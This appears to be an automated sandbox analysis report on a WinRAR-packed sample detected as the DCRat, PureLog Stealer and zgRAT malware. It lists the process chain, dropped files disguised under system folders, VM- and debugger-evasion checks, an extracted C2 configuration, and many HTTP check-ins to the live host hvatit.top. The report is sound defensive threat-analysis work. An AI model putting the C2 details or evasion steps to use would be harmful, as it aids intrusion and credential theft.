Windows Analysis Report
cuAvoExY41.exe

Overview

General Information

Sample name:cuAvoExY41.exe
renamed because original name is a hash value
Original sample name:7DDACBFDACD9E8AEACD1B0F2DEA51F4E.exe
Analysis ID:1502155
MD5:7ddacbfdacd9e8aeacd1b0f2dea51f4e
SHA1:36667e13972c28da816f52fd4ef2b910e50de531
SHA256:dc6859bdfc93d108f11e63dc630453b11c0be85446fd448d3c2c1aa5ad4ce077
Tags:DCRatexe

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cuAvoExY41.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\cuAvoExY41.exe" MD5: 7DDACBFDACD9E8AEACD1B0F2DEA51F4E)
    • wscript.exe (PID: 7328 cmdline: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ChainPortServerBrowsermonitor.exe (PID: 7464 cmdline: "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe" MD5: 5FA91A09D2073FA85C2B69A00EA7C1FC)
          • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7592 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "http://hvatit.top/dbwp", "MUTEX": "DCR_MUTEX-m1fLYfg6CkBPCrY00CRN", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
cuAvoExY41.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
cuAvoExY41.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.cuAvoExY41.exe.65786ef.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.cuAvoExY41.exe.65786ef.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, ProcessId: 7464, TargetFilename: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe
                                    Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\cuAvoExY41.exe", ParentImage: C:\Users\user\Desktop\cuAvoExY41.exe, ParentProcessId: 7284, ParentProcessName: cuAvoExY41.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" , ProcessId: 7328, ProcessName: wscript.exe
                                    Timestamp:2024-08-31T09:32:13.286244+0200
                                    SID:2048095
                                    Severity:1
                                    Source Port:49732
                                    Destination Port:80
                                    Protocol:TCP
                                    Classtype:A Network Trojan was detected

                                    AV Detection

                                    Source: cuAvoExY41.exe | Avira: detected
                                    Source: http://hvatit.top/dbwp.php | Avira URL Cloud: Label: malware
                                    Source: C:\Users\user\Desktop\EQOQCKPT.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\oOILjGZF.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat | Avira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\mKRcJKjf.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\surrogateFontdhcpCommon\upfc.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\vnZStDyM.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://hvatit.top/dbwp", "MUTEX": "DCR_MUTEX-m1fLYfg6CkBPCrY00CRN", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | ReversingLabs: Detection: 91%
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Virustotal: Detection: 54%
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | ReversingLabs: Detection: 91%
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | Virustotal: Detection: 54%
                                    Source: C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | ReversingLabs: Detection: 91%
                                    Source: C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Virustotal: Detection: 54%
                                    Source: C:\Users\user\Desktop\CUGzHwzy.log | ReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\CUGzHwzy.log | Virustotal: Detection: 28%
                                    Source: C:\Users\user\Desktop\EQOQCKPT.log | ReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\EQOQCKPT.log | Virustotal: Detection: 69%
                                    Source: C:\Users\user\Desktop\UxpXqoOQ.log | Virustotal: Detection: 10%
                                    Source: C:\Users\user\Desktop\VDAxqXDQ.log | ReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\VDAxqXDQ.log | Virustotal: Detection: 27%
                                    Source: C:\Users\user\Desktop\dVTvzLpX.log | Virustotal: Detection: 10%
                                    Source: C:\Users\user\Desktop\ddDNduPc.log | ReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\ddDNduPc.log | Virustotal: Detection: 28%
                                    Source: C:\Users\user\Desktop\ffpwzeUX.log | ReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ffpwzeUX.log | Virustotal: Detection: 27%
                                    Source: C:\Users\user\Desktop\mKRcJKjf.log | Virustotal: Detection: 21%
                                    Source: C:\Users\user\Desktop\oOILjGZF.log | Virustotal: Detection: 21%
                                    Source: C:\Users\user\Desktop\vnZStDyM.log | ReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\vnZStDyM.log | Virustotal: Detection: 69%
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | ReversingLabs: Detection: 91%
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Virustotal: Detection: 54%
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | ReversingLabs: Detection: 91%
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Virustotal: Detection: 54%
                                    Source: C:\surrogateFontdhcpCommon\upfc.exe | ReversingLabs: Detection: 91%
                                    Source: C:\surrogateFontdhcpCommon\upfc.exe | Virustotal: Detection: 54%
                                    Source: cuAvoExY41.exe | ReversingLabs: Detection: 65%
                                    Source: cuAvoExY41.exe | Virustotal: Detection: 57%
                                    Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.0% probability
                                    Source: C:\Users\user\Desktop\EQOQCKPT.log | Joe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\dVTvzLpX.log | Joe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Joe Sandbox ML: detected
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | Joe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Joe Sandbox ML: detected
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Joe Sandbox ML: detected
                                    Source: C:\surrogateFontdhcpCommon\upfc.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\UxpXqoOQ.log | Joe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\vnZStDyM.log | Joe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | Joe Sandbox ML: detected
                                    Source: cuAvoExY41.exe | Joe Sandbox ML: detected
                                    Source: cuAvoExY41.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Directory created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Directory created: C:\Program Files\Microsoft Office 15\6bc8f6e50ab287
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Directory created: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | Directory created: C:\Program Files\Windows Multimedia Platform\24dbde2999530e
                                    Source: cuAvoExY41.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cuAvoExY41.exe
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exe | Code function: 0_2_00FBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00FBA69B
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exe | Code function: 0_2_00FCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00FCC220
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | File opened: C:\Users\user
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | File opened: C:\Users\user\AppData
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | File opened: C:\Users\user\AppData\Local

                                    Networking

                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 80.211.144.156:80
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox View | IP Address: 80.211.144.156 80.211.144.156
                                    Source: Joe Sandbox View | ASN Name: ARUBA-ASNIT ARUBA-ASNIT
                                    Source: global traffic | HTTP traffic detected:
                                        POST /dbwp.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                        Host: hvatit.top
                                        Content-Length: 344
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 380Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /dbwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: hvatit.top Content-Length: 1436 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /dbwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: hvatit.top Content-Length: 2552 Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
